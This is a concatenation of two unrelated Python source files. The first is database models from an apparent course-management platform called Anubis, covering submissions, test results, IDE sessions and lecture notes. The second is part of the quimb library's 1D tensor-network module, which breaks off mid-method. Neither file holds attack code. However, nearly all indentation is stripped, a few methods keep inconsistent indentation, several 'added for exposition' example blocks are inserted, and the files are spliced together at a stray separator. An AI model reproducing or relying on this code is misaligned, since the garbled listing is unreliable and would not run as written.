repo = db.relationship(AssignmentRepo, backref="submissions")
@property
def visible_tests(self):
"""
Get a list of dictionaries of the matching Test, and TestResult
for the current submission.
:return:
"""
# Query for matching AssignmentTests, and TestResults
tests = (
SubmissionTestResult.query.join(AssignmentTest)
.filter(
SubmissionTestResult.submission_id == self.id,
AssignmentTest.hidden == False,
)
.all()
)
# Convert to dictionary data
return [
{"test": result.assignment_test.data, "result": result.data}
for result in tests
]
@property
def all_tests(self):
"""
Get a list of dictionaries of the matching Test, and TestResult
for the current submission.
:return:
"""
# Query for matching AssignmentTests, and TestResults
tests = (
SubmissionTestResult.query.join(AssignmentTest)
.filter(
SubmissionTestResult.submission_id == self.id,
)
.all()
)
# Convert to dictionary data
return [
{"test": result.assignment_test.data, "result": result.data}
for result in tests
]
@property
def data(self):
return {
"id": self.id,
"assignment_name": self.assignment.name,
"assignment_due": str(self.assignment.due_date),
"course_code": self.assignment.course.course_code,
"commit": self.commit,
"processed": self.processed,
"state": self.state,
"created": str(self.created),
"last_updated": str(self.last_updated),
"error": self.errors is not None,
}
@property
def full_data(self):
data = self.data
# Add connected models
data["repo"] = self.repo.repo_url
data["tests"] = self.visible_tests
data["build"] = self.build.data if self.build is not None else None
return data
@property
def admin_data(self):
data = self.data
# Add connected models
data["repo"] = self.repo.repo_url
data["tests"] = self.all_tests
data["build"] = self.build.data if self.build is not None else None
return data
class SubmissionTestResult(db.Model):
__tablename__ = "submission_test_result"
# id
id = default_id()
# Foreign Keys
submission_id = db.Column(
db.String(128), db.ForeignKey(Submission.id), primary_key=True
)
assignment_test_id = db.Column(
db.String(128), db.ForeignKey(AssignmentTest.id), primary_key=True
)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
# Fields
stdout = deferred(db.Column(db.Text))
message = deferred(db.Column(db.Text))
passed = db.Column(db.Boolean)
# Relationships
assignment_test = db.relationship(AssignmentTest)
@property
def data(self):
return {
"id": self.id,
"test_name": self.assignment_test.name,
"passed": self.passed,
"message": self.message,
"stdout": self.stdout,
"created": str(self.created),
"last_updated": str(self.last_updated),
}
@property
def stat_data(self):
data = self.data
del data["stdout"]
return data
def __str__(self):
    # Only reference fields that actually exist on this model (there is no
    # ``testname`` or ``errors`` attribute on SubmissionTestResult).
    return "test_name: {}\nmessage: {}\npassed: {}\n".format(
        self.assignment_test.name,
        self.message,
        self.passed,
    )
class SubmissionBuild(db.Model):
__tablename__ = "submission_build"
# id
id = default_id()
# Foreign Keys
submission_id = db.Column(db.String(128), db.ForeignKey(Submission.id), index=True)
# Fields
stdout = deferred(db.Column(db.Text))
passed = db.Column(db.Boolean, default=None)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"stdout": self.stdout,
"passed": self.passed,
}
@property
def stat_data(self):
data = self.data
del data["stdout"]
return data
class TheiaSession(db.Model):
__tablename__ = "theia_session"
# id
id = default_id(32)
course_id = db.Column(
db.String(128), db.ForeignKey(Course.id), nullable=False, index=True
)
# Foreign keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), nullable=False)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), nullable=True
)
repo_url = db.Column(db.String(128), nullable=True)
# Fields
active = db.Column(db.Boolean, default=True)
state = db.Column(db.TEXT)
cluster_address = db.Column(db.TEXT, nullable=True, default=None)
image = db.Column(db.TEXT, default="registry.digitalocean.com/anubis/theia-xv6")
resources = db.Column(MutableJson, default=lambda: {})
network_policy = db.Column(db.String(128), default="os-student")
network_locked = db.Column(db.Boolean, default=True)
privileged = db.Column(db.Boolean, default=False)
autosave = db.Column(db.Boolean, default=True)
credentials = db.Column(db.Boolean, default=False)
persistent_storage = db.Column(db.Boolean, default=False)
k8s_requested = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
ended = db.Column(db.DateTime, nullable=True, default=None)
last_proxy = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
from anubis.lms.theia import theia_redirect_url
return {
"id": self.id,
"assignment_id": self.assignment_id,
"assignment_name": self.assignment.name
if self.assignment_id is not None
else None,
"course_code": self.assignment.course.course_code
if self.assignment_id is not None
else None,
"netid": self.owner.netid,
"repo_url": self.repo_url,
"redirect_url": theia_redirect_url(self.id, self.owner.netid),
"active": self.active,
"state": self.state,
"created": str(self.created),
"ended": str(self.ended),
"last_proxy": str(self.last_proxy),
"last_updated": str(self.last_updated),
"autosave": self.autosave,
"persistent_storage": self.persistent_storage,
}
@property
def settings(self):
return {
"image": self.image,
"repo_url": self.repo_url,
"autosave": self.autosave,
"privileged": self.privileged,
"credentials": self.credentials,
"network_locked": self.network_locked,
"persistent_storage": self.persistent_storage,
}
class StaticFile(db.Model):
__tablename__ = "static_file"
id = default_id()
course_id = db.Column(
db.String(128), db.ForeignKey(Course.id), nullable=False, index=True
)
# Fields
filename = db.Column(db.TEXT)
path = db.Column(db.TEXT)
content_type = db.Column(db.TEXT)
blob = deferred(db.Column(db.LargeBinary(length=(2 ** 32) - 1)))
hidden = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
lecture_notes = db.relationship(
"LectureNotes", cascade="all,delete", backref="static_file"
)
@property
def data(self):
return {
"id": self.id,
"content_type": self.content_type,
"filename": self.filename,
"path": self.path,
"hidden": self.hidden,
"uploaded": str(self.created),
}
class LateException(db.Model):
__tablename__ = "late_exception"
user_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), primary_key=True
)
# New Due Date
due_date = db.Column(db.DateTime, nullable=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"user_id": self.user_id,
"user_name": self.user.name,
"user_netid": self.user.netid,
"assignment_id": self.assignment_id,
"due_date": str(self.due_date),
}
class LectureNotes(db.Model):
__tablename__ = "lecture_notes"
id = default_id()
# Foreign keys
static_file_id = db.Column(
db.String(128), db.ForeignKey(StaticFile.id), nullable=False, index=True
)
course_id = db.Column(
db.String(128), db.ForeignKey(Course.id), nullable=False, index=True
)
# Meta fields
post_time = db.Column(db.DateTime, nullable=True, default=datetime.now)
title = db.Column(db.TEXT, default="")
description = db.Column(db.TEXT, default="")
hidden = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"id": self.id,
"static_file": self.static_file.data,
"course": self.course.course_code,
"title": self.title,
"description": self.description,
"hidden": self.hidden,
"post_time": str(self.post_time),
"created": str(self.created),
"last_updated": str(self.last_updated),
}
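# --- Illustrative usage sketch (added for exposition; not part of Anubis) ---
# A minimal example of wiring these models into a Flask app. The in-memory
# SQLite URI and the app setup below are assumptions for demonstration only.
def _example_bootstrap():
    from flask import Flask

    app = Flask(__name__)
    app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite://"
    app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
    db.init_app(app)

    with app.app_context():
        db.create_all()
        user = User(netid="abc123", name="Example Student")
        db.session.add(user)
        db.session.commit()
        return user.netid  # -> "abc123"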
|
the-stack_0_1691 | """Classes and algorithms related to 1D tensor networks.
"""
import re
import operator
import functools
from math import log2
from numbers import Integral
import scipy.sparse.linalg as spla
from autoray import do, dag, reshape, conj, get_dtype_name, transpose
from ..utils import (
check_opt, print_multi_line, ensure_dict, partition_all, deprecated
)
import quimb as qu
from .tensor_core import (
Tensor,
TensorNetwork,
rand_uuid,
bonds,
bonds_size,
oset,
tags_to_oset,
get_tags,
PTensor,
)
from .tensor_arbgeom import tensor_network_align, tensor_network_apply_op_vec
from ..linalg.base_linalg import norm_trace_dense
from . import array_ops as ops
align_TN_1D = deprecated(
tensor_network_align, 'align_TN_1D', 'tensor_network_align')
def expec_TN_1D(*tns, compress=None, eps=1e-15):
"""Compute the expectation of several 1D TNs, using transfer matrix
compression if any are periodic.
Parameters
----------
tns : sequence of TensorNetwork1D
The MPS and MPO to find expectation of. Should start and begin with
an MPS e.g. ``(MPS, MPO, ..., MPS)``.
compress : {None, False, True}, optional
Whether to perform transfer matrix compression on cyclic systems. If
set to ``None`` (the default), decide heuristically.
eps : float, optional
The accuracy of the transfer matrix compression.
Returns
-------
x : float
The expectation value.
"""
expec_tn = functools.reduce(operator.or_, tensor_network_align(*tns))
# if OBC or <= 0.0 specified use exact contraction
cyclic = any(tn.cyclic for tn in tns)
if not cyclic:
compress = False
n = expec_tn.L
isflat = all(isinstance(tn, TensorNetwork1DFlat) for tn in tns)
# work out whether to compress, could definitely be improved ...
if compress is None and isflat:
# compression only worth it for long, high bond dimension TNs.
total_bd = qu.prod(tn.bond_size(0, 1) for tn in tns)
compress = (n >= 100) and (total_bd >= 1000)
if compress:
expec_tn.replace_section_with_svd(1, n, eps=eps, inplace=True)
return expec_tn ^ all
return expec_tn ^ ...
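# Illustrative sketch (added for exposition, assuming the standard quimb MPS
# and MPO constructors): computing an energy expectation <psi|H|psi>.
def _example_expec():
    from quimb.tensor import MPS_rand_state, MPO_ham_heis
    psi = MPS_rand_state(20, bond_dim=16)
    ham = MPO_ham_heis(20)
    # bra, operator, ket -- aligned and contracted by expec_TN_1D
    return expec_TN_1D(psi.H, ham, psi)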
_VALID_GATE_CONTRACT = {False, True, 'swap+split',
'split-gate', 'swap-split-gate', 'auto-split-gate'}
_VALID_GATE_PROPAGATE = {'sites', 'register', False, True}
_TWO_BODY_ONLY = _VALID_GATE_CONTRACT - {True, False}
def maybe_factor_gate_into_tensor(G, dp, ng, where):
# allow gate to be a matrix as long as it factorizes into tensor
shape_matches_2d = (ops.ndim(G) == 2) and (G.shape[1] == dp ** ng)
shape_matches_nd = all(d == dp for d in G.shape)
if shape_matches_2d:
G = ops.asarray(G)
if ng >= 2:
G = reshape(G, [dp] * 2 * ng)
elif not shape_matches_nd:
raise ValueError(
f"Gate with shape {G.shape} doesn't match sites {where}.")
return G
def gate_TN_1D(tn, G, where, contract=False, tags=None,
propagate_tags='sites', inplace=False,
cur_orthog=None, **compress_opts):
r"""Act with the gate ``g`` on sites ``where``, maintaining the outer
indices of the 1D tensor netowork::
contract=False contract=True
. . . . <- where
o-o-o-o-o-o-o o-o-o-GGG-o-o-o
| | | | | | | | | | / \ | | |
GGG
| |
contract='split-gate' contract='swap-split-gate'
. . . . <- where
o-o-o-o-o-o-o o-o-o-o-o-o-o
| | | | | | | | | | | | | |
G~G G~G
| | \ /
X
/ \
contract='swap+split'
. . <- where
o-o-o-G=G-o-o-o
| | | | | | | |
Note that the sites in ``where`` do not have to be contiguous. By default,
site tags will be propagated to the gate tensors, identifying a
'light cone'.
Parameters
----------
tn : TensorNetwork1DVector
The 1D vector-like tensor network, for example, and MPS.
G : array
A square array to act with on sites ``where``. It should have twice the
number of dimensions as the number of sites. The second half of these
will be contracted with the MPS, and the first half indexed with the
correct ``site_ind_id``. Sites are read left to right from the shape.
A two-dimensional array is permissible if each dimension factorizes
correctly.
where : int or sequence of int
Where the gate should act.
contract : {False, 'split-gate', 'swap-split-gate',
'auto-split-gate', True, 'swap+split'}, optional
Whether to contract the gate into the 1D tensor network. If,
- False: leave the gate uncontracted, the default
- 'split-gate': like False, but split the gate if it is two-site.
- 'swap-split-gate': like 'split-gate', but decompose the gate as
if a swap had first been applied
- 'auto-split-gate': automatically select between the above three
options, based on the rank of the gate.
- True: contract the gate into the tensor network, if the gate acts
on more than one site, this will produce an ever larger tensor.
- 'swap+split': Swap sites until they are adjacent, then contract
the gate and split the resulting tensor, then swap the sites back
to their original position. In this way an MPS structure can be
explicitly maintained at the cost of rising bond-dimension.
tags : str or sequence of str, optional
Tag the new gate tensor with these tags.
propagate_tags : {'sites', 'register', False, True}, optional
Add any tags from the sites to the new gate tensor (only matters if
``contract=False`` else tags are merged anyway):
- If ``'sites'``, then only propagate tags matching e.g. 'I{}' and
ignore all others. I.e. just propagate the lightcone.
- If ``'register'``, then only propagate tags matching the sites of
where this gate was actually applied. I.e. ignore the lightcone,
just keep track of which 'registers' the gate was applied to.
- If ``False``, propagate nothing.
- If ``True``, propagate all tags.
inplace : bool, optional
Perform the gate in place.
compress_opts
Supplied to :meth:`~quimb.tensor.tensor_core.Tensor.split`
if ``contract`` is one of the gate-splitting modes, or
:meth:`~quimb.tensor.tensor_1d.MatrixProductState.gate_with_auto_swap`
if ``contract='swap+split'``.
Returns
-------
TensorNetwork1DVector
See Also
--------
MatrixProductState.gate_split
Examples
--------
>>> p = MPS_rand_state(3, 7)
>>> p.gate_(spin_operator('X'), where=1, tags=['GX'])
>>> p
<MatrixProductState(tensors=4, L=3, max_bond=7)>
>>> p.outer_inds()
('k0', 'k1', 'k2')
"""
check_opt('contract', contract, _VALID_GATE_CONTRACT)
check_opt('propagate_tags', propagate_tags, _VALID_GATE_PROPAGATE)
psi = tn if inplace else tn.copy()
if isinstance(where, Integral):
where = (where,)
ng = len(where) # number of sites the gate acts on
dp = psi.phys_dim(where[0])
tags = tags_to_oset(tags)
if (ng > 2) and contract in _TWO_BODY_ONLY:
raise ValueError(f"Can't use `contract='{contract}'` for >2 sites.")
G = maybe_factor_gate_into_tensor(G, dp, ng, where)
if contract == 'swap+split' and ng > 1:
psi.gate_with_auto_swap(G, where, cur_orthog=cur_orthog,
inplace=True, **compress_opts)
return psi
bnds = [rand_uuid() for _ in range(ng)]
site_ix = [psi.site_ind(i) for i in where]
gate_ix = site_ix + bnds
psi.reindex_(dict(zip(site_ix, bnds)))
# get the sites that used to have the physical indices
site_tids = psi._get_tids_from_inds(bnds, which='any')
# convert the gate into a tensor - check if it is parametrized
if isinstance(G, ops.PArray):
if (ng >= 2) and (contract is not False):
raise ValueError(
"For a parametrized gate acting on more than one site "
"``contract`` must be false to preserve the array shape.")
TG = PTensor.from_parray(G, gate_ix, tags=tags, left_inds=bnds)
else:
TG = Tensor(G, gate_ix, tags=tags, left_inds=bnds)
# handle 'swap+split' only for ``ng == 1``
if contract in (True, 'swap+split'):
# pop the sites, contract, then re-add
pts = [psi._pop_tensor(tid) for tid in site_tids]
psi |= TG.contract(*pts)
return psi
# if not contracting the gate into the network, work out which tags to
# 'propagate' forward from the tensors being acted on to the gate tensors
if propagate_tags:
if propagate_tags == 'register':
old_tags = oset(map(psi.site_tag, where))
else:
old_tags = get_tags(psi.tensor_map[tid] for tid in site_tids)
if propagate_tags == 'sites':
# use regex to take tags only matching e.g. 'I0', 'I13'
rex = re.compile(psi.site_tag_id.format(r"\d+"))
old_tags = oset(filter(rex.match, old_tags))
TG.modify(tags=TG.tags | old_tags)
if ng == 1:
psi |= TG
return psi
# check if we should split multi-site gates (which may result in an easier
# tensor network to contract if we use compression)
if contract in ('split-gate', 'auto-split-gate'):
# | | | |
# GGG --> G~G
# | | | |
ts_gate_norm = TG.split(TG.inds[::2], get='tensors', **compress_opts)
# sometimes it is worth performing the decomposition *across* the gate,
# effectively introducing a SWAP
if contract in ('swap-split-gate', 'auto-split-gate'):
# \ /
# | | X
# GGG --> / \
# | | G~G
# | |
ts_gate_swap = TG.split(TG.inds[::3], get='tensors', **compress_opts)
# like 'split-gate' but check the rank for swapped indices also, and if no
# rank reduction, simply don't swap
if contract == 'auto-split-gate':
# | | \ /
# | | | | X | |
# GGG --> G~G or / \ or ... GGG
# | | | | G~G | |
# | | | |
norm_rank = bonds_size(*ts_gate_norm)
swap_rank = bonds_size(*ts_gate_swap)
if swap_rank < norm_rank:
contract = 'swap-split-gate'
elif norm_rank < dp**ng:
contract = 'split-gate'
else:
# else no rank reduction available - leave as ``contract=False``.
contract = False
if contract == 'swap-split-gate':
ts_gate = ts_gate_swap
elif contract == 'split-gate':
ts_gate = ts_gate_norm
else:
ts_gate = (TG,)
# if we are splitting the gate then only add site tags on the tensors
# directly 'above' the site
if contract in ('split-gate', 'swap-split-gate'):
if propagate_tags == 'register':
ts_gate[0].drop_tags(psi.site_tag(where[1]))
ts_gate[1].drop_tags(psi.site_tag(where[0]))
for t in ts_gate:
psi |= t
return psi
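# Illustrative sketch (added for exposition, assuming quimb's built-in CNOT
# and MPS constructors): applying a two-site gate to non-adjacent sites while
# keeping an explicit MPS structure via ``contract='swap+split'``.
def _example_gate_swap_split():
    from quimb.tensor import MPS_rand_state
    p = MPS_rand_state(6, bond_dim=4)
    # swap sites 1 and 4 together, contract the gate, split, then swap back
    gate_TN_1D(p, qu.CNOT(), (1, 4), contract='swap+split', inplace=True)
    return p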
def superop_TN_1D(tn_super, tn_op,
upper_ind_id='k{}',
lower_ind_id='b{}',
so_outer_upper_ind_id=None,
so_inner_upper_ind_id=None,
so_inner_lower_ind_id=None,
so_outer_lower_ind_id=None):
r"""Take a tensor network superoperator and act with it on a
tensor network operator, maintaining the original upper and lower
indices of the operator::
outer_upper_ind_id upper_ind_id
| | | ... | | | | ... |
+----------+ +----------+
| tn_super +---+ | tn_super +---+
+----------+ | upper_ind_id +----------+ |
| | | ... | | | | | ... | | | | ... | |
inner_upper_ind_id| +-----------+ +-----------+ |
| + | tn_op | = | tn_op | |
inner_lower_ind_id| +-----------+ +-----------+ |
| | | ... | | | | | ... | | | | ... | |
+----------+ | lower_ind_id +----------+ |
| tn_super +---+ | tn_super +---+
+----------+ +----------+
| | | ... | <-- | | | ... |
outer_lower_ind_id lower_ind_id
Parameters
----------
tn_super : TensorNetwork
The superoperator in the form of a 1D-like tensor network.
tn_op : TensorNetwork
The operator to be acted on in the form of a 1D-like tensor network.
upper_ind_id : str, optional
Current id of the upper operator indices, e.g. usually ``'k{}'``.
lower_ind_id : str, optional
Current id of the lower operator indices, e.g. usually ``'b{}'``.
so_outer_upper_ind_id : str, optional
Current id of the superoperator's upper outer indices, these will be
reindexed to form the new effective operators upper indices.
so_inner_upper_ind_id : str, optional
Current id of the superoperator's upper inner indices, these will be
joined with those described by ``upper_ind_id``.
so_inner_lower_ind_id : str, optional
Current id of the superoperator's lower inner indices, these will be
joined with those described by ``lower_ind_id``.
so_outer_lower_ind_id : str, optional
Current id of the superoperator's lower outer indices, these will be
reindexed to form the new effective operators lower indices.
Returns
-------
KAK : TensorNetwork
The tensor network of the superoperator acting on the operator.
"""
n = tn_op.L
if so_outer_upper_ind_id is None:
so_outer_upper_ind_id = getattr(tn_super, 'outer_upper_ind_id', 'kn{}')
if so_inner_upper_ind_id is None:
so_inner_upper_ind_id = getattr(tn_super, 'inner_upper_ind_id', 'k{}')
if so_inner_lower_ind_id is None:
so_inner_lower_ind_id = getattr(tn_super, 'inner_lower_ind_id', 'b{}')
if so_outer_lower_ind_id is None:
so_outer_lower_ind_id = getattr(tn_super, 'outer_lower_ind_id', 'bn{}')
reindex_map = {}
for i in range(n):
upper_bnd = rand_uuid()
lower_bnd = rand_uuid()
reindex_map[upper_ind_id.format(i)] = upper_bnd
reindex_map[lower_ind_id.format(i)] = lower_bnd
reindex_map[so_inner_upper_ind_id.format(i)] = upper_bnd
reindex_map[so_inner_lower_ind_id.format(i)] = lower_bnd
reindex_map[so_outer_upper_ind_id.format(i)] = upper_ind_id.format(i)
reindex_map[so_outer_lower_ind_id.format(i)] = lower_ind_id.format(i)
return tn_super.reindex(reindex_map) & tn_op.reindex(reindex_map)
class TensorNetwork1D(TensorNetwork):
"""Base class for tensor networks with a one-dimensional structure.
"""
_NDIMS = 1
_EXTRA_PROPS = ('_site_tag_id', '_L')
_CONTRACT_STRUCTURED = True
def _compatible_1d(self, other):
"""Check whether ``self`` and ``other`` are compatible 2D tensor
networks such that they can remain a 2D tensor network when combined.
"""
return (
isinstance(other, TensorNetwork1D) and
all(getattr(self, e) == getattr(other, e)
for e in TensorNetwork1D._EXTRA_PROPS)
)
def __and__(self, other):
new = super().__and__(other)
if self._compatible_1d(other):
new.view_as_(TensorNetwork1D, like=self)
return new
def __or__(self, other):
new = super().__or__(other)
if self._compatible_1d(other):
new.view_as_(TensorNetwork1D, like=self)
return new
@property
def L(self):
"""The number of sites.
"""
return self._L
@property
def nsites(self):
"""The number of sites.
"""
return self._L
def gen_site_coos(self):
return tuple(i for i in range(self.L) if
self.site_tag(i) in self.tag_map)
@property
def site_tag_id(self):
"""The string specifier for tagging each site of this 1D TN.
"""
return self._site_tag_id
def site_tag(self, i):
"""The name of the tag specifiying the tensor at site ``i``.
"""
if not isinstance(i, str):
i = i % self.L
return self.site_tag_id.format(i)
def slice2sites(self, tag_slice):
"""Take a slice object, and work out its implied start, stop and step,
taking into account cyclic boundary conditions.
Examples
--------
Normal slicing:
>>> p = MPS_rand_state(10, bond_dim=7)
>>> p.slice2sites(slice(5))
(0, 1, 2, 3, 4)
>>> p.slice2sites(slice(4, 8))
(4, 5, 6, 7)
Slicing from end backwards:
>>> p.slice2sites(slice(..., -3, -1))
(9, 8)
Slicing round the end:
>>> p.slice2sites(slice(7, 12))
(7, 8, 9, 0, 1)
>>> p.slice2sites(slice(-3, 2))
(7, 8, 9, 0, 1)
If the start point is > end point (*before* modulo n), then step needs
to be negative to return anything.
"""
if tag_slice.start is None:
start = 0
elif tag_slice.start is ...:
if tag_slice.step == -1:
start = self.L - 1
else:
start = -1
else:
start = tag_slice.start
if tag_slice.stop in (..., None):
stop = self.L
else:
stop = tag_slice.stop
step = 1 if tag_slice.step is None else tag_slice.step
return tuple(s % self.L for s in range(start, stop, step))
def maybe_convert_coo(self, x):
"""Check if ``x`` is an integer and convert to the
corresponding site tag if so.
"""
if isinstance(x, Integral):
return (self.site_tag(x),)
if isinstance(x, slice):
return tuple(map(self.site_tag, self.slice2sites(x)))
return x
def _get_tids_from_tags(self, tags, which='all'):
"""This is the function that lets single integers be used for many
'tag' based functions.
"""
tags = self.maybe_convert_coo(tags)
return super()._get_tids_from_tags(tags, which=which)
def retag_sites(self, new_id, where=None, inplace=False):
"""Modify the site tags for all or some tensors in this 1D TN
(without changing the ``site_tag_id``).
"""
if where is None:
where = self.gen_site_coos()
return self.retag({self.site_tag(i): new_id.format(i) for i in where},
inplace=inplace)
@site_tag_id.setter
def site_tag_id(self, new_id):
if self._site_tag_id != new_id:
self.retag_sites(new_id, inplace=True)
self._site_tag_id = new_id
@property
def site_tags(self):
"""An ordered tuple of the actual site tags.
"""
return tuple(map(self.site_tag, self.gen_site_coos()))
@property
def sites(self):
return tuple(self.gen_site_coos())
@functools.wraps(tensor_network_align)
def align(self, *args, inplace=False, **kwargs):
return tensor_network_align(self, *args, inplace=inplace, **kwargs)
align_ = functools.partialmethod(align, inplace=True)
def contract_structured(
self,
tag_slice,
structure_bsz=5,
inplace=False,
**opts
):
"""Perform a structured contraction, translating ``tag_slice`` from a
``slice`` or `...` to a cumulative sequence of tags.
Parameters
----------
tag_slice : slice or ...
The range of sites, or `...` for all.
inplace : bool, optional
Whether to perform the contraction inplace.
Returns
-------
TensorNetwork, Tensor or scalar
The result of the contraction, still a ``TensorNetwork`` if the
contraction was only partial.
See Also
--------
contract, contract_tags, contract_cumulative
"""
# check for all sites
if tag_slice is ...:
# else slice over all sites
tag_slice = slice(0, self.L)
# filter sites by the slice, but also which sites are present at all
tags_seq = filter(self.tag_map.__contains__,
map(self.site_tag, self.slice2sites(tag_slice)))
# partition sites into `structure_bsz` groups
if structure_bsz > 1:
tags_seq = partition_all(structure_bsz, tags_seq)
# contract each block of sites cumulatively
return self.contract_cumulative(tags_seq, inplace=inplace, **opts)
def __repr__(self):
"""Insert length and max bond into standard print.
"""
s = super().__repr__()
extra = f', L={self.L}, max_bond={self.max_bond()}'
s = f'{s[:-2]}{extra}{s[-2:]}'
return s
def __str__(self):
"""Insert length and max bond into standard print.
"""
s = super().__str__()
extra = f', L={self.L}, max_bond={self.max_bond()}'
s = f'{s[:-1]}{extra}{s[-1:]}'
return s
class TensorNetwork1DVector(TensorNetwork1D,
TensorNetwork):
"""1D Tensor network which overall is like a vector with a single type of
site ind.
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_site_ind_id',
'_L',
)
def reindex_all(self, new_id, inplace=False):
"""Reindex all physical sites and change the ``site_ind_id``.
"""
tn = self if inplace else self.copy()
tn.site_ind_id = new_id
return tn
reindex_all_ = functools.partialmethod(reindex_all, inplace=True)
def reindex_sites(self, new_id, where=None, inplace=False):
"""Update the physical site index labels to a new string specifier.
Note that this doesn't change the stored id string with the TN.
Parameters
----------
new_id : str
A string with a format placeholder to accept an int, e.g. "ket{}".
where : None or slice
Which sites to update the index labels on. If ``None`` (default)
all sites.
inplace : bool
Whether to reindex in place.
"""
if where is None:
indices = self.gen_site_coos()
elif isinstance(where, slice):
indices = self.slice2sites(where)
else:
indices = where
return self.reindex({self.site_ind(i): new_id.format(i)
for i in indices}, inplace=inplace)
reindex_sites_ = functools.partialmethod(reindex_sites, inplace=True)
def _get_site_ind_id(self):
return self._site_ind_id
def _set_site_ind_id(self, new_id):
if self._site_ind_id != new_id:
self.reindex_sites_(new_id)
self._site_ind_id = new_id
site_ind_id = property(_get_site_ind_id, _set_site_ind_id,
doc="The string specifier for the physical indices")
def site_ind(self, i):
"""Get the physical index name of site ``i``.
"""
if not isinstance(i, str):
i = i % self.L
return self.site_ind_id.format(i)
@property
def site_inds(self):
"""An ordered tuple of the actual physical indices.
"""
return tuple(map(self.site_ind, self.gen_site_coos()))
def to_dense(self, *inds_seq, **contract_opts):
"""Return the dense ket version of this 1D vector, i.e. a
``qarray`` with shape (-1, 1).
"""
if not inds_seq:
# just use list of site indices
return do('reshape', TensorNetwork.to_dense(
self, self.site_inds, **contract_opts
), (-1, 1))
return TensorNetwork.to_dense(self, *inds_seq, **contract_opts)
def phys_dim(self, i=None):
if i is None:
i = next(iter(self.gen_site_coos()))
return self.ind_size(self.site_ind(i))
@functools.wraps(gate_TN_1D)
def gate(self, *args, inplace=False, **kwargs):
return gate_TN_1D(self, *args, inplace=inplace, **kwargs)
gate_ = functools.partialmethod(gate, inplace=True)
@functools.wraps(expec_TN_1D)
def expec(self, *args, **kwargs):
return expec_TN_1D(self, *args, **kwargs)
def correlation(self, A, i, j, B=None, **expec_opts):
"""Correlation of operator ``A`` between ``i`` and ``j``.
Parameters
----------
A : array
The operator to act with, can be multi site.
i : int or sequence of int
The first site(s).
j : int or sequence of int
The second site(s).
expec_opts
Supplied to :func:`~quimb.tensor.tensor_1d.expec_TN_1D`.
Returns
-------
C : float
The connected correlation ``<A(i) B(j)> - <A(i)> <B(j)>``.
Examples
--------
>>> ghz = (MPS_computational_state('0000') +
... MPS_computational_state('1111')) / 2**0.5
>>> ghz.correlation(pauli('Z'), 0, 1)
1.0
>>> ghz.correlation(pauli('Z'), 0, 1, B=pauli('X'))
0.0
"""
if B is None:
B = A
bra = self.H
pA = self.gate(A, i, contract=True)
cA = expec_TN_1D(bra, pA, **expec_opts)
pB = self.gate(B, j, contract=True)
cB = expec_TN_1D(bra, pB, **expec_opts)
pAB = pA.gate_(B, j, contract=True)
cAB = expec_TN_1D(bra, pAB, **expec_opts)
return cAB - cA * cB
class TensorNetwork1DOperator(TensorNetwork1D,
TensorNetwork):
_EXTRA_PROPS = (
'_site_tag_id',
'_upper_ind_id',
'_lower_ind_id',
'_L',
)
def reindex_lower_sites(self, new_id, where=None, inplace=False):
"""Update the lower site index labels to a new string specifier.
Parameters
----------
new_id : str
A string with a format placeholder to accept an int, e.g.
``"ket{}"``.
where : None or slice
Which sites to update the index labels on. If ``None`` (default)
all sites.
inplace : bool
Whether to reindex in place.
"""
if where is None:
start = 0
stop = self.L
else:
start = 0 if where.start is None else where.start
stop = self.L if where.stop is ... else where.stop
return self.reindex({self.lower_ind(i): new_id.format(i)
for i in range(start, stop)}, inplace=inplace)
reindex_lower_sites_ = functools.partialmethod(
reindex_lower_sites, inplace=True)
def reindex_upper_sites(self, new_id, where=None, inplace=False):
"""Update the upper site index labels to a new string specifier.
Parameters
----------
new_id : str
A string with a format placeholder to accept an int, e.g. "ket{}".
where : None or slice
Which sites to update the index labels on. If ``None`` (default)
all sites.
inplace : bool
Whether to reindex in place.
"""
if where is None:
start = 0
stop = self.L
else:
start = 0 if where.start is None else where.start
stop = self.L if where.stop is ... else where.stop
return self.reindex({self.upper_ind(i): new_id.format(i)
for i in range(start, stop)}, inplace=inplace)
reindex_upper_sites_ = functools.partialmethod(
reindex_upper_sites, inplace=True)
def _get_lower_ind_id(self):
return self._lower_ind_id
def _set_lower_ind_id(self, new_id):
if new_id == self._upper_ind_id:
raise ValueError("Setting the same upper and lower index ids will"
" make the two ambiguous.")
if self._lower_ind_id != new_id:
self.reindex_lower_sites_(new_id)
self._lower_ind_id = new_id
lower_ind_id = property(
_get_lower_ind_id, _set_lower_ind_id,
doc="The string specifier for the lower phyiscal indices")
def lower_ind(self, i):
"""The name of the lower ('ket') index at site ``i``.
"""
return self.lower_ind_id.format(i)
@property
def lower_inds(self):
"""An ordered tuple of the actual lower physical indices.
"""
return tuple(map(self.lower_ind, self.gen_site_coos()))
def _get_upper_ind_id(self):
return self._upper_ind_id
def _set_upper_ind_id(self, new_id):
if new_id == self._lower_ind_id:
raise ValueError("Setting the same upper and lower index ids will"
" make the two ambiguous.")
if self._upper_ind_id != new_id:
self.reindex_upper_sites_(new_id)
self._upper_ind_id = new_id
upper_ind_id = property(_get_upper_ind_id, _set_upper_ind_id,
doc="The string specifier for the upper phyiscal "
"indices")
def upper_ind(self, i):
"""The name of the upper ('bra') index at site ``i``.
"""
return self.upper_ind_id.format(i)
@property
def upper_inds(self):
